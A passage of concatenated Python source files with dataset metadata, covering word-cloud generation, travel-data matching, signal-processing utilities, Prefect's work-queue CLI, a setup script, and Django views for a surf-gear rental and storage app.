\"\"\nconcat_ind = \"\"\n\ni = 1\n\nlist_of_xml = identify_xml.identifying_xml(\"./Papers\")\n\nfor paper in range(len(list_of_xml)):\n \n #Storing the returned information\n parser_data = BeautifulSoup(openXML(list_of_xml[paper]), \"xml\")\n\n #Finding all instances of the indicated tag\n\n find_tag = parser_data.find_all('abstract')\n\n #Loop that concatenates all of the paragraphs\n for paragraph in range(len(find_tag)):\n concat = concat + str(find_tag[paragraph])\n\n concat_ind = concat_ind + str(find_tag[paragraph])\n concat_def = BeautifulSoup(concat_ind, \"lxml\").text\n\n if paragraph+1 == len(find_tag):\n #creating the wordcloud for each paper\n createWordcloud(concat_def,str(i))\n\n i = i+1\n\n concat_ind = \"\" \n\n#For removing xml tags:\nconcat_definite = BeautifulSoup(concat, \"lxml\").text\n\n#creating a wordcloud of all of the pdf abstracts\ncreateWordcloud(concat_definite, \"_all_papers\")\n","sub_path":"2ndAssigment/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
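A minimal word-cloud sketch in the spirit of the cloud.py record above; the input text and the output filename here are invented for illustration:

from wordcloud import WordCloud, STOPWORDS

# Citation noise ("et", "al") is added to the default stop words, as in the record above.
stopwords = set(STOPWORDS) | {"et", "al"}
wc = WordCloud(background_color="white", stopwords=stopwords, width=400, height=600)
wc.generate("hypothetical abstract text about exhaustive grid search and signal processing")
wc.to_file("wordcloud_example.png")  # hypothetical output path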
 +{"seq_id":"248212401","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport json\nimport linecache\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\n\ndef write2file(file_name, content):\n\tfile_object = open(file_name, 'a')\n\tfile_object.write(content)\n\tfile_object.close()\n\n\ndef init_city_id_name_map(in_file):\n\tcity_id_name_map = {}\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tsplit_fields = i_line.split('\\t')\n\t\tcity_id_name_map[unicode(split_fields[1].strip())] = split_fields[0].strip()\n\treturn city_id_name_map\n\n\ndef flat_accommodation_info(in_file, out_file):\n\t# Initialize the map from city names to city IDs\n\tcity_id_name_map = init_city_id_name_map(file_city_id_name_mapping)\n\n\tpattern = re.compile(u'若以(.*?)[作]?为考量')\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tjson_obj = json.loads(i_line)\n\t\tdestination = json_obj['destination']\n\t\taccommodation_info = json_obj['accommodation_info']\n\t\tfor info in accommodation_info.split('\\n'):\n\t\t\tjudge = '概述'\n\t\t\tcity_code = 'CITY_CODE'\n\t\t\tm = pattern.search(info)\n\t\t\tif m is not None:\n\t\t\t\tjudge = m.group(1)\n\t\t\tif destination in city_id_name_map.keys():\n\t\t\t\tcity_code = city_id_name_map[destination]\n\t\t\tcontent = city_code + '-->' + destination + '-->' + judge + '-->' + info + '\\n'\n\t\t\twrite2file(out_file, content)\n\n\ndef init_business_info_map(in_file):\n\tbusiness_info_map = {}\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tsplit_fields = i_line.split('\\t')\n\t\tbusiness_id = split_fields[0]\n\t\tbusiness_name = split_fields[1]\n\t\tprovince_id = split_fields[2]\n\t\tcity_id = split_fields[3]\n\t\tbusiness_name_en = split_fields[4]\n\n\t\tif city_id not in business_info_map.keys():\n\t\t\tbusiness_list = []\n\t\telse:\n\t\t\tbusiness_list = business_info_map[city_id]\n\t\tbusiness_dict = {}\n\t\tbusiness_dict['id'] = business_id\n\t\tbusiness_dict['cn_name'] = business_name\n\t\tbusiness_dict['en_name'] = business_name_en\n\t\tbusiness_list.append(business_dict)\n\t\tbusiness_info_map[city_id] = business_list\n\treturn business_info_map\n\n\ndef match_business(in_file, out_file):\n\t# Initialize the map from city IDs to business info\n\tbusiness_info_map = init_business_info_map(file_hotel_business_area)\n\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tif 'CITY_CODE' in i_line: continue\n\t\tsplit_fields = i_line.split('-->')\n\t\tcity_id = split_fields[0].strip()\n\t\taccommodation_desc = split_fields[3].strip()\n\t\trelate_business = []\n\t\tif city_id in business_info_map.keys():\n\t\t\tfor business_info in business_info_map[city_id]:\n\t\t\t\tbusiness_id = business_info['id']\n\t\t\t\tbusiness_ch_name = business_info['cn_name']\n\t\t\t\tbusiness_en_name = business_info['en_name']\n\t\t\t\tif business_ch_name in accommodation_desc:\n\t\t\t\t\trelate_business.append(business_ch_name)\n\t\t\t\telif business_en_name in accommodation_desc:\n\t\t\t\t\trelate_business.append(business_en_name)\n\t\tif len(relate_business) > 0:\n\t\t\ti_line = i_line.strip() + '-->' + '@@@@'.join(relate_business) + '\\n'\n\t\telse:\n\t\t\ti_line = i_line.strip() + '-->' + '' + '\\n'\n\t\twrite2file(out_file, i_line)\n\n\nif __name__ == '__main__':\n\tfile_match_step_1 = 'match_step_1.txt'\n\tfile_match_step_2 = 'match_step_2.txt'\n\tfile_accommodation_info = 'accommodation_info.txt'\n\tfile_city_id_name_mapping = 'city_id_name_mapping.txt'\n\tfile_hotel_business_area = 'hotel_business_area.txt'\n\n\t# flat_accommodation_info(file_accommodation_info, file_match_step_1)\n\tmatch_business(file_match_step_1, file_match_step_2)\n","sub_path":"tripadvisor/match_process.py","file_name":"match_process.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
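The matching step above is plain substring containment against each business's Chinese and English names; a self-contained sketch of the same idea, with invented names and text:

business_infos = [{'cn_name': u'西湖', 'en_name': 'West Lake'}]
desc = u'Hotels near West Lake are convenient for sightseeing.'
matched = [b['cn_name'] for b in business_infos
           if b['cn_name'] in desc or b['en_name'] in desc]
print('@@@@'.join(matched))  # joins matches with the same separator the script writes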
 +{"seq_id":"172442529","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 16 17:40:53 2019\n\n@author: Ahmed\n\nThis file gives a few functions for signal processing and display.\n\n\"\"\"\n\nimport numpy as np\nimport math\n\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as col\nimport matplotlib.mlab as mlab\n\n# builds a spectrogram\ndef getFreqArray(data, freqS, fenetre, minFreq, maxFreq):\n '''Returns the time-frequency map, as (times, frequencies, measures[time][freq]).\n Takes a pair of the form (timestamps, datas), where timestamps and datas are lists.\n fenetre is the width of the time window taken around each time point for the FFT.\n freqS is the rate at which FFTs are computed over the signal. '''\n fen = fenetre/2\n freqE = len(data[0])/(data[0][-1] - data[0][0])\n n = int(fenetre*freqE)\n t = np.arange(data[0][0] + fen, data[0][-1] - fen, 1./freqS)\n buffer = np.zeros((len(t),n))\n l = [0 for _ in range(len(t))]\n for i in range(len(data[0])):\n for a in range(len(t)):\n if l[a] < n and (t[a] - fen < data[0][i] or n-l[a] >= len(data[0])-i):\n buffer[a, l[a]] = data[1][i]\n l[a] += 1\n freq = np.fft.rfftfreq(n, 1./freqE)\n fmin = 0\n fmax = 0\n for i in freq:\n if i > minFreq:\n break\n fmin += 1\n for i in freq:\n fmax += 1\n if i > maxFreq:\n break\n return (t, freq[fmin:fmax], abs(np.fft.rfft(buffer, norm = 'ortho'))[:,fmin:fmax])\n\n# displays the spectrogram\ndef specto(data, minFreq = 5, maxFreq = 40):\n fig, ax = plt.subplots(figsize=(10,6))\n Pxx = spectoArray(data)\n im = ax.imshow(Pxx, interpolation = 'spline16', extent = (0, 2, minFreq, maxFreq), origin = 'lower')\n ax.set_aspect(aspect = 0.7*2/35)\n fig.colorbar(im)\n return Pxx\n\n\ndef spectoArray(data, minFreq = 5, maxFreq = 40):\n Pxx, freqs, bins = mlab.specgram(data, NFFT=200, Fs=500, noverlap=180, mode = 'magnitude')\n fmin = 0\n fmax = 0\n for i in freqs:\n if i > minFreq:\n break\n fmin += 1\n for i in freqs:\n fmax += 1\n if i > maxFreq:\n break\n Pxx = Pxx[fmin:fmax,:]\n return Pxx\n \ndef getCarteElec(data, freqS, fenetre, minFreq, maxFreq, elec):\n return getFreqArray((data[0], data[elec]), freqS, fenetre, minFreq, maxFreq)[2].flatten()\n\ndef getCarte(data, freqS, fenetre, minFreq, maxFreq):\n ''' Returns the time-frequency map, built from the recorded data'''\n return np.array([getFreqArray((data[0], data[i]), freqS, fenetre, minFreq, maxFreq)[2].flatten() for i in range(1,9) ]).flatten()\n\ndef drawFreqArray(carte):\n m = carte[2].max()\n \n fig, ax = plt.subplots()\n X,Y = np.meshgrid(carte[0], carte[1])\n levels = np.arange(0, m, m/1000.)\n norm = col.Normalize(0, m)\n contour = ax.contourf(X,Y, carte[2].transpose(), levels = levels, norm = norm)\n fig.colorbar(contour)\n ax.set_xlabel(\"time\")\n ax.set_ylabel(\"frequency\")\n \n return fig\n\ndef imshowFreqArray(carte):\n fig, ax = plt.subplots(figsize=(10,6))\n Pxx = carte[2]\n freq = carte[1]\n im = ax.imshow(Pxx.transpose(), interpolation = 'spline16', extent = (0, 2, freq[0], freq[-1]), origin = 'lower')\n ax.set_aspect(aspect = 0.7*2/35)\n fig.colorbar(im)\n\ndef drawElectrode(data, elec, freqS, fenetre, minFreq = 5, maxFreq = 40):\n f = getFreqArray((data[0],data[elec]),freqS, fenetre, minFreq, maxFreq)\n drawFreqArray(f)\n \ndef filtreMoyen(data, fenetre):\n '''Deviation from the mean over a window of fenetre points. data is a one-dimensional array or list '''\n fenetre = fenetre//2\n S = sum(data[0:fenetre])\n nb = fenetre\n N = len(data)\n filtrer = np.empty(len(data))\n for i in range(N):\n if i - fenetre >= 0:\n S -= data[i-fenetre]\n nb -= 1\n if i + fenetre < N:\n S += data[i+fenetre]\n nb += 1\n filtrer[i] = data[i] - S/nb\n return filtrer\n\ndef recentrage(data , fen = 0):\n M = sum(data)/len(data)\n return data - M*np.ones(data.shape)\n \ndef Invfft(freq, data, t):\n return [ sum([data[i]*math.sin(2*np.pi*freq[i]*j) for i in range(len(freq)) ]) for j in t ]\n \ndef CompareEle(db, i, elec):\n a = db.loadedSignal[i].data\n b = moy(filtreMoyen(a[elec], 100), 10)\n #b = recentrage(a[elec], 100)\n plt.subplots()\n plt.plot(a[0], a[elec])\n plt.subplots()\n plt.plot(a[0], b)\n \n fig, ax = plt.subplots()\n \n freq = np.fft.rfftfreq(len(a[elec]), 1./500.)\n fmin = 0\n fmax = 0\n for i in freq:\n if i > 5:\n break\n fmin += 1\n for i in freq:\n fmax += 1\n if i > 40:\n break\n plt.plot(np.fft.rfftfreq(len(a[elec]), 1/500.)[fmin:fmax], abs(np.fft.rfft(a[elec], norm = 'ortho'))[fmin:fmax], label = 'unfiltered')\n #plt.subplots()\n plt.plot(np.fft.rfftfreq(len(b), 1/500.)[fmin:fmax], abs(np.fft.rfft(b, norm = 'ortho'))[fmin:fmax], label = 'filtered')\n ax.legend()\n \n drawFreqArray(getFreqArray((a[0], a[elec]), 10, 0.5, 5, 40))\n drawFreqArray(getFreqArray((a[0], b), 50, 0.5, 5, 40))\n \ndef moy(data, fenetre):\n '''moving average (simple convolution) over a window'''\n fenetre = fenetre//2\n S = sum(data[0:fenetre])\n nb = fenetre\n N = len(data)\n filtrer = np.empty(len(data))\n for i in range(N):\n if i - fenetre >= 0:\n S -= data[i-fenetre]\n nb -= 1\n if i + fenetre < N:\n S += data[i+fenetre]\n nb += 1\n filtrer[i] = S/nb\n return filtrer\n \ndef filtreSignal(s, fenetreLine, fenetreMoy = 10):\n '''Applies filtreMoyen to remove linear drift and recenter the signal (edges dropped to avoid end effects),\n then a moving average to cut the 50 Hz mains component'''\n return np.array( [s[0]] +\n [moy(filtreMoyen(s[i], fenetreLine), fenetreMoy) for i in range(1, 9)])\n \n\n \n \n \n \n \n \n ","sub_path":"carte.py","file_name":"carte.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"374240165","text":"\"\"\"\nCommand line interface for working with work queues.\n\"\"\"\nfrom typing import List\nfrom uuid import UUID\n\nimport anyio\nimport pendulum\nimport typer\nfrom rich.pretty import Pretty\nfrom rich.table import Table\n\nfrom prefect.cli.base import (\n PrefectTyper,\n app,\n console,\n exit_with_error,\n exit_with_success,\n)\nfrom prefect.client import get_client\nfrom prefect.exceptions import ObjectAlreadyExists, ObjectNotFound\n\nwork_app = PrefectTyper(name=\"work-queue\", help=\"Commands for work queue CRUD.\")\napp.add_typer(work_app)\n\n\n@work_app.command()\nasync def create(\n name: str = typer.Argument(..., help=\"The unique name to assign this work queue\"),\n tags: List[str] = typer.Option(\n None, \"-t\", \"--tag\", help=\"One or more optional tags\"\n ),\n deployment_ids: List[UUID] = typer.Option(\n None, \"-d\", \"--deployment\", help=\"One or more optional deployment IDs\"\n ),\n flow_runner_types: List[str] = typer.Option(\n None, \"-fr\", \"--flow-runner\", help=\"One or more optional flow runner types\"\n ),\n):\n \"\"\"\n Create a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n result = await client.create_work_queue(\n name=name,\n tags=tags or None,\n 
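# Hedged aside: None here (rather than an empty list) leaves that dimension of the queue unfiltered.\n 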
deployment_ids=deployment_ids or None,\n flow_runner_types=flow_runner_types or None,\n )\n except ObjectAlreadyExists:\n exit_with_error(f\"Work queue with name: {name!r} already exists.\")\n\n console.print(Pretty(result))\n\n\n@work_app.command()\nasync def set_concurrency_limit(\n id: UUID = typer.Argument(..., help=\"The id of the work queue\"),\n limit: int = typer.Argument(..., help=\"The concurrency limit to set on the queue.\"),\n):\n \"\"\"\n Set a concurrency limit on a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n concurrency_limit=limit,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Concurrency limit of {limit} set on work queue {id}\")\n\n\n@work_app.command()\nasync def clear_concurrency_limit(\n id: UUID = typer.Argument(..., help=\"The id of the work queue to clear\"),\n):\n \"\"\"\n Clear any concurrency limits from a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n concurrency_limit=None,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Concurrency limits removed on work queue {id}\")\n\n\n@work_app.command()\nasync def pause(\n id: UUID = typer.Argument(..., help=\"The ID of the work queue to pause.\"),\n):\n \"\"\"\n Pause a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n is_paused=True,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Paused work queue {id}\")\n\n\n@work_app.command()\nasync def resume(\n id: UUID = typer.Argument(..., help=\"The ID of the work queue to resume.\"),\n):\n \"\"\"\n Resume a paused work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n is_paused=False,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Resumed work queue {id}\")\n\n\n@work_app.command()\nasync def inspect(id: UUID):\n \"\"\"\n Inspect a work queue by ID.\n \"\"\"\n async with get_client() as client:\n try:\n result = await client.read_work_queue(id=id)\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n console.print(Pretty(result))\n\n\n@work_app.command()\nasync def ls(\n verbose: bool = typer.Option(\n False, \"--verbose\", \"-v\", help=\"Display more information.\"\n )\n):\n \"\"\"\n View all work queues.\n \"\"\"\n table = Table(\n title=\"Work Queues\", caption=\"(**) denotes a paused queue\", caption_style=\"red\"\n )\n table.add_column(\"ID\", justify=\"right\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Name\", style=\"green\", no_wrap=True)\n table.add_column(\"Concurrency Limit\", style=\"blue\", no_wrap=True)\n if verbose:\n table.add_column(\"Filter\", style=\"magenta\", no_wrap=True)\n\n async with get_client() as client:\n queues = await client.read_work_queues()\n\n sort_by_created_key = lambda q: pendulum.now(\"utc\") - q.created\n\n for queue in sorted(queues, key=sort_by_created_key):\n\n row = [\n str(queue.id),\n f\"{queue.name} [red](**)\" if queue.is_paused else queue.name,\n f\"[red]{queue.concurrency_limit}\"\n if queue.concurrency_limit\n else \"[blue]None\",\n ]\n if verbose:\n row.append(queue.filter.json())\n table.add_row(*row)\n\n console.print(table)\n\n\n@work_app.command()\nasync def preview(\n id: UUID = 
typer.Argument(..., help=\"The id of the work queue\"),\n hours: int = typer.Option(\n None,\n \"-h\",\n \"--hours\",\n help=\"The number of hours to look ahead; defaults to 1 hour\",\n ),\n):\n \"\"\"\n Preview a work queue.\n \"\"\"\n table = Table(caption=\"(**) denotes a late run\", caption_style=\"red\")\n table.add_column(\n \"Scheduled Start Time\", justify=\"left\", style=\"yellow\", no_wrap=True\n )\n table.add_column(\"Run ID\", justify=\"left\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Name\", style=\"green\", no_wrap=True)\n table.add_column(\"Deployment ID\", style=\"blue\", no_wrap=True)\n\n window = pendulum.now(\"utc\").add(hours=hours or 1)\n async with get_client() as client:\n try:\n runs = await client.get_runs_in_work_queue(\n id, limit=10, scheduled_before=window\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n now = pendulum.now(\"utc\")\n sort_by_created_key = lambda r: now - r.created\n\n for run in sorted(runs, key=sort_by_created_key):\n table.add_row(\n f\"{run.expected_start_time} [red](**)\"\n if run.expected_start_time < now\n else f\"{run.expected_start_time}\",\n str(run.id),\n run.name,\n str(run.deployment_id),\n )\n\n if runs:\n console.print(table)\n else:\n console.print(\n \"No runs found - try increasing how far into the future you preview with the --hours flag\",\n style=\"yellow\",\n )\n\n\n@work_app.command()\nasync def delete(id: UUID):\n \"\"\"\n Delete a work queue by ID.\n \"\"\"\n async with get_client() as client:\n try:\n await client.delete_work_queue_by_id(id=id)\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Deleted work queue {id}\")\n","sub_path":"src/prefect/cli/work_queue.py","file_name":"work_queue.py","file_ext":"py","file_size_in_byte":7149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"232372825","text":"import os\nimport pathlib\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\ncfg = pathlib.Path('pytest.ini')\nis_pytest_config_exists = pathlib.Path('pytest.ini').exists()\nif os.getenv('ENV') == 'DEV':\n if not is_pytest_config_exists:\n os.symlink('pytest.dev.ini', 'pytest.ini', )\n else:\n os.remove(str(cfg))\n os.symlink('pytest.dev.ini', 'pytest.ini', )\n\nelse:\n if not is_pytest_config_exists:\n os.symlink('pytest.default.ini', 'pytest.ini')\n else:\n os.remove(str(cfg))\n os.symlink('pytest.default.ini', 'pytest.ini')\n\nsetup(\n packages=find_packages(),\n setup_requires=[\"pytest-runner\"],\n install_requires=[],\n tests_require=['pytest==4.0.1', 'pytest-mock==1.10.0', 'coverage>=4.5.2',\n 'pytest-cov==2.6.0', 'pytest-asyncio>=0.9.0'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"500530175","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom surf_rental.forms import LoginForm, PersonalInfoForm\nfrom surf_rental.forms import SignUpForm, AddWindboardsForm, AddWindsailForm, AddKiteboardsForm, AddKiteForm, \\\n SignUpFormSuperUser\nfrom surf_rental.models import 
UserProfile, Storage, WindBoard, RentalWindBoard, WindSail, RentalWindSail, KiteKite, \\\n KiteBoard, RentalKite, RentalKiteBoard\nimport datetime\n\nfrom django.template.defaulttags import register\n\n\n\n\n\n# Create your views here.\n\nclass HomePageView(View):\n def get(self, request):\n form = LoginForm()\n return render(request, 'base.html', {'form': form})\n\n def post(self, request):\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/next/')\n form = LoginForm()\n # return render(request, 'homepage.html', {'msg':'zalogowano'})\n return render(request, 'base.html',\n {'form': form, 'msg_error': 'NIE UDAŁO SIĘ ZALOGOWAĆ, SPRÓBUJ JESZCZE RAZ'})\n\n\nclass UserCreation(View):\n\n def get(self, request):\n form = SignUpForm()\n form_2 = PersonalInfoForm()\n return render(request, 'UserCreation.html', {'form': form, 'form2': form_2})\n\n def post(self, request, commit=True):\n new_contact = form = SignUpForm(request.POST)\n form_2 = PersonalInfoForm(request.POST)\n\n if form.is_valid():\n instance = form.save()\n users_id = instance.id\n\n if form_2.is_valid():\n phone = form_2.cleaned_data['phone']\n city = form_2.cleaned_data['city']\n birth_date = form_2.cleaned_data['birth_date']\n sex = form_2.cleaned_data['sex']\n street = form_2.cleaned_data['country']\n post_code = form_2.cleaned_data['post_code']\n country = form_2.cleaned_data['country']\n user_profile = UserProfile.objects.create(user_id=users_id, phone=phone, birth_date=birth_date, sex=sex,\n city=city, street=street, post_code=post_code,\n country=country)\n\n return HttpResponse(f'UDało sie stworzyć użytkownika {users_id}')\n return render(request, 'UserCreation.html', {'form': form, 'form2': form_2})\n\n\nclass LogOut(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n logout(request)\n msg = 'wylogowano'\n return HttpResponseRedirect('/')\n\n\nclass HomeView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n # template_name = \"base.html\"\n login_url = \"/\"\n redirect_field_name = \"redirect_to\"\n\n def get(self, request):\n return render(request, 'homepage.html')\n\n\nclass WindSurfView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'wind.html',\n {'boards': WindBoard.objects.all(), 'learning': WindBoard.objects.filter(type=1),\n 'freeride': WindBoard.objects.filter(type=2)})\n\n def post(self, request):\n date = request.POST.get('date')\n hour_from = int(request.POST.get('hour_from'))\n hour_to = int(request.POST.get('hour_to'))\n print(date, hour_from, hour_to)\n boards = WindBoard.objects.all()\n sails = WindSail.objects.all()\n\n available_boards = []\n available_sails = []\n date_now = str(datetime.date.today())\n\n if date_now > date:\n msg = 'Data z przeszłości'\n return render(request, 'wind.html', {'msg_storage': msg})\n if hour_to < hour_from:\n msg = 'źle zadeklarowałeś godziny'\n return render(request, 'wind.html', {'msg_storage': msg})\n\n for sail in sails:\n rentals_windsail = RentalWindSail.objects.filter(windsail=sail, date=date)\n if len(rentals_windsail) == 0:\n available_sails.append(sail)\n else:\n can_be_added = True\n for i in rentals_windsail:\n if i.hour_from < hour_to or i.hour_to > hour_from: # 
psuja\n can_be_added = False\n break\n if can_be_added:\n available_sails.append(sail)\n\n for board in boards:\n rentals_windboard = RentalWindBoard.objects.filter(windboard=board, date=date)\n if len(rentals_windboard) == 0:\n available_boards.append(board)\n else:\n can_be_added = True\n for r in rentals_windboard:\n if r.hour_from < hour_to or r.hour_to > hour_from: # psuja\n can_be_added = False\n break\n if can_be_added:\n available_boards.append(board)\n\n request.session['date'] = date\n request.session['hour_to'] = hour_to\n request.session['hour_from'] = hour_from\n print(available_sails, available_boards)\n\n return render(request, 'windrental.html',\n {'boards': available_boards, 'learning': WindBoard.objects.filter(type=1),\n 'freeride': WindBoard.objects.filter(type=2), 'sails': available_sails})\n\n\n################### przerobka na KITESURFVIEW\n\nclass KiteSurfView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'kite.html', {'boards': KiteBoard.objects.all()})\n\n def post(self, request):\n date = request.POST.get('date')\n hour_from = int(request.POST.get('hour_from'))\n hour_to = int(request.POST.get('hour_to'))\n print(date, hour_from, hour_to)\n boards = KiteBoard.objects.all()\n kites = KiteKite.objects.all()\n available_boards = []\n available_kites = []\n date_now = str(datetime.date.today())\n print(boards, kites)\n\n if date_now > date:\n msg = 'Data z przeszłości'\n return render(request, 'kite.html', {'msg_storage': msg})\n if hour_to < hour_from:\n msg = 'źle zadeklarowałeś godziny'\n return render(request, 'kite.html', {'msg_storage': msg})\n\n for kite in kites:\n rentals_kites = RentalKite.objects.filter(kite=kite, date=date)\n if len(rentals_kites) == 0:\n available_kites.append(kite)\n else:\n can_be_added = True\n for i in rentals_kites:\n if i.hour_from < hour_to or i.hour_to > hour_from: # psuja\n can_be_added = False\n break\n if can_be_added:\n available_kites.append(kite)\n\n for board in boards:\n rentals_kiteboard = RentalKiteBoard.objects.filter(kiteboard=board, date=date)\n if len(rentals_kiteboard) == 0:\n available_boards.append(board)\n else:\n can_be_added = True\n for r in rentals_kiteboard:\n if r.hour_from < hour_to or r.hour_to > hour_from: # psuja\n can_be_added = False\n break\n if can_be_added:\n available_boards.append(board)\n\n request.session['date'] = date\n request.session['hour_to'] = hour_to\n request.session['hour_from'] = hour_from\n\n return render(request, 'kiterental.html',\n {'boards': available_boards, 'kites': available_kites})\n\n\n############################################3\n\n\n# class KiteSurfView(View):\n# def get(self, request):\n# return render(request, 'kite.html')\n#\n# def post(self, request):\n# type = 'kitesurfing'\n# board_description = request.POST.get('board_description')\n# sail_kite_description = request.POST.get('kite_sail_description')\n# sail_or_kite=2\n# current_user = request.user\n# id= current_user.id\n# new = Storage.objects.create(type=type, board_description=board_description, sail_kite_description=sail_kite_description, owner_id=id, sail_or_kite=sail_or_kite)\n# return HttpResponseRedirect('/next')\n\n\nclass WindRentalView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'windrental.html')\n # def post(self, request):\n # return HttpResponse('k')\n\n\nclass KiteRentalView(LoginRequiredMixin, View):\n login_url = 
'/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'kiterental.html')\n # def post(self, request):\n # return HttpResponse('k')\n\n\nclass AdminView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'adminview.html')\n\n def post(self, request):\n pass\n\n\nclass MyProfileView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n\n rentals_wind_board = RentalWindBoard.objects.filter(user_id=id)\n rentals_wind_sail = RentalWindSail.objects.filter(user_id=id)\n rentals_kite_kite = RentalKite.objects.filter(user_id=id)\n rentals_kite_board = RentalKiteBoard.objects.filter(user_id=id)\n storage = Storage.objects.filter(owner_id=id)\n price_per_day = 10\n prices = {}\n\n for item in storage:\n time_diff = datetime.date.today() - item.date\n\n print('datetime.date.today()', datetime.date.today(), 'item.date', item.date, 'dupa', time_diff.days)\n prices[item.id] = price_per_day * (time_diff.days + 1)\n\n context = {'rentals_wind_board': rentals_wind_board,\n 'rentals_wind_sail': rentals_wind_sail,\n 'rentals_kite_kite': rentals_kite_kite,\n 'rentals_kite_board': rentals_kite_board,\n 'storage': storage,\n 'user': user,\n 'prices': prices}\n\n return render(request, 'profile.html', context)\n\n\nclass SaveKiteReservationView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def post(self, request):\n current_user = request.user\n id = current_user.id\n board_id = request.POST.get('radio_board')\n sail_id = request.POST.get('radio_sail')\n date_1 = request.session.get('date')\n hour_from = request.session.get('hour_from')\n hour_to = request.session.get('hour_to')\n\n print(date_1, hour_from, hour_to)\n if board_id != None:\n new_board = RentalKiteBoard.objects.create(user_id=id, kiteboard_id=board_id, date=date_1,\n hour_from=hour_from, hour_to=hour_to)\n if sail_id != None:\n new_sail = RentalKite.objects.create(user_id=id, kite_id=sail_id, date=date_1, hour_from=hour_from,\n hour_to=hour_to)\n\n storage_user = Storage.objects.filter(owner_id=id)\n kiteboard_rentals_user = RentalKiteBoard.objects.filter(user_id=id)\n kite_rentals_user = RentalKite.objects.filter(user_id=id)\n user = User.objects.get(id=id)\n user_profile = UserProfile.objects.filter(user_id=id)\n context = {\n 'user': user,\n 'user_profile': user_profile,\n 'kiteboard_rental': kiteboard_rentals_user,\n 'kite_rental': kite_rentals_user,\n 'storage': storage_user\n }\n\n return render(request, 'profile.html', context)\n\n\nclass SaveWindReservationView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def post(self, request):\n current_user = request.user\n id = current_user.id\n board_id = request.POST.get('radio_board')\n sail_id = request.POST.get('radio_sail')\n date_1 = request.session.get('date')\n hour_from = request.session.get('hour_from')\n hour_to = request.session.get('hour_to')\n\n print(date_1, hour_from, hour_to)\n if board_id != None:\n new_board = RentalWindBoard.objects.create(user_id=id, windboard_id=board_id, date=date_1,\n hour_from=hour_from, hour_to=hour_to)\n if sail_id != None:\n new_sail = RentalWindSail.objects.create(user_id=id, windsail_id=sail_id, date=date_1, hour_from=hour_from,\n hour_to=hour_to)\n\n storage_user = Storage.objects.filter(owner_id=id)\n 
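# Hedged aside, not the app's code: these separate per-model queries could cut ORM round trips with select_related, e.g. RentalWindBoard.objects.filter(user_id=id).select_related('windboard').\n 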
